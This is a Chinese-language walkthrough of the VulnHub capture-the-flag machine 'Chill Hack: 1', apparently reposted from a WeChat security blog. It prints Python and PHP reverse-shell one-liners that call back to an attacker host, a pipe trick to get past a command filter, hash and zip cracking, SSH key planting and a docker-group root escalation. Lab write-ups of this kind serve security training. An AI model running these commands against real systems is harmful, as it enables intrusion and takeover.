0x01 靶机介绍
-
Name: Chill Hack: 1
-
Date release: 9 Dec 2020
-
Author: Anurodh Acharya
-
Series: Chill Hack
-
Description: Find flags(user and root)
-
Difficulty: Easy
靶机下载地址:
https://www.vulnhub.com/entry/chill-hack-1,622/0x02 侦察
nmap -p- -sV -sC -A 192.168.0.103 -oA nmap_chill-hack
gobuster dir -u http://192.168.0.103 -w /usr/share/wordlists/dirb/big.txt -x php
访问http://192.168.0.103/secret可执行命令
0x03 上线【WWW-data】
FTP匿名登录
通过匿名登录漏洞成功进入 FTP 服务
ftpftp > open 192.168.0.103## 输入账号anynomousftp > lsftp > get note.txt
查看notes.txt,提示显示命令执行存在字符过滤
cat note.txt
命令执行
输入whoami执行命令,命令执行成功
但一旦输入敏感字符就会被拦截
执行which 'nc'命令发现目标存在 nc,但是通过mac 'nc'命令发现不存在-e和-c参数
Python反弹shell
在本地监听5555 端口
nc -nvlp 5555输入以下命令通过 Python 执行反弹shell
'python3' -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.0.106",5555));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
成功拿到反弹shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
PHP反弹shell
在本地监听6666 端口
nc -nvlp 6666利用管道符进行绕过
whoami|php -r '$sock=fsockopen("192.168.0.106",6666);exec("/bin/bash -i <&3 >&3 2>&3");'成功拿到反弹shell
0x04 权限提升【apaar】
在/var/www/files中找到文件hacker.php,同时存在敏感图片路径images/hacker-with-laptop_23-2147985341.jpg
在该目录下还有文件index.php,内容如下
成功找到 MySQL 数据库的连接账号密码
dbname: webportalhost: localhostusername: rootpassword: !@m+her00+@db
sudo提权
查看当前用户 sudo 权限,在以 apaar 用户身份执行/home/apaar/.helpline.sh脚本时无需密码
sudo -l
通过 sudo 以 apaar 用户身份执行该脚本,成功提权为 apaar 用户
sudo -u apaar /home/apaar/.helpline.shmyselfbashbash > id
在当前用户家目录下成功拿到第一个flag
python3 -c 'import pty;pty.spawn("/bin/bash")'cd ~cat local.txt
0x05 权限提升【ROOT】
SSH私钥登录
在本地中生成 SSH 密钥
ssh-keygen
把生成的公钥内容复制到目标靶机的authoried_key中
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDqd/pE+JzFvsEsubvx04yM8eeEkypqIh09J6+QiwXHjViL/lh3Y+mRSQOuaFRVdogHlidFhU4mPQf+NfgkcHKceh+zB+poXx9Mev/9YqmPgMuviaJYpvOxo+72aJOrKLxghZycx5OiyaiIgbYzcj1D595uFy2W8r0hgRCmH0cfDLXCqWtfQwX6wc4+ztL2oWUSOLHyKJMABBVxIhDqbM2ZmKw7mxjzKM6WtoZ66yMk23TxAotV4+eI2Vb/XqUksDb4ptLO0hsTpomIifp5Drfv8UKWnRrIfWDcvbP/KUypjUb3yLx0FdbNNedNm5SJj0EyNb1VI4IMU2Au3IinOUVOWjsyFOS35kllSdWTfuLj/RqBixM3hfpsx2jnCEYYk05iahaJpEGbVz8PRGsStNiYG/DE5JT5ddYvONjDAEZ1VuAfT5wIpGWrPS3Yoe6Hj+FVQd9CfsJirPPehXopKxZO3iw43qyDeYZ8V9qhenNdoJdENDm6QohC/Fcv9tRVvc= root@kali' ~/.ssh/authorized_keys
通过 SSH 成功免密登录
ssh apaar@192.168.0.103
如果出现以下情况,可直接使用命令清除记录
ssh-keygen -f "/root/.ssh/known_hosts" -R "192.168.0.103"
mysql -uroot -p -Dwebportal##输入密码!@m+her00+@db
| 1 | Anurodh | Acharya | Aurick | 7e53614ced3640d5de23f111806cc4fd || 2 | Apaar | Dahal | cullapaar | 686216240e5af30df0501e53c789a649 |
在解密网站上对密码进行破解,成功解密为明文 网站地址:
https://crackstation.net/
7e53614ced3640d5de23f111806cc4fd: masterpassword686216240e5af30df0501e53c789a649: dontaskdonttell
scp apaar@192.168.0.103:/var/www/files/images/hacker-with-laptop_23-2147985341.jpg .使用 steghide 配合空密码提取数据,成功拿到 zip 压缩包,但解压需要密码
steghide extract -sf hacker-with-laptop_23-2147985341.jpg利用 fcrackzip 进行密码爆破,成功拿到密码pass1word
fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt backup.zip
解压后源码如下,在其中发现经编码后的密码
unzip back.zipcat source_code.php
通过 Base64 解码拿到密码为!d0ntKn0wmYp@ssw0rd
echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d
查看全部用户,可登录用户只有apaar、anurodh、aurick
cat /etc/passwd | grep -v nologin
通过aunrodh/!d0ntKn0wmYp@ssw0rd成功登录目标 SSH,该用户属于 docker 组
ssh anurodh@192.168.0.103id
https://gtfobins.github.io/
寻找 docker 提权命令并成功提权
docker run -v /:/mnt --rm -it alpine chroot /mnt sh在管理员用户家目录下成功找到第二个flag
python3 -c 'import pty;pty.spawn("/bin/bash")'cd ~cat proof.txt
0x06 知识星球
原文始发于微信公众号(狐狸说安全):Vulnhub-Chill-Hack-1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论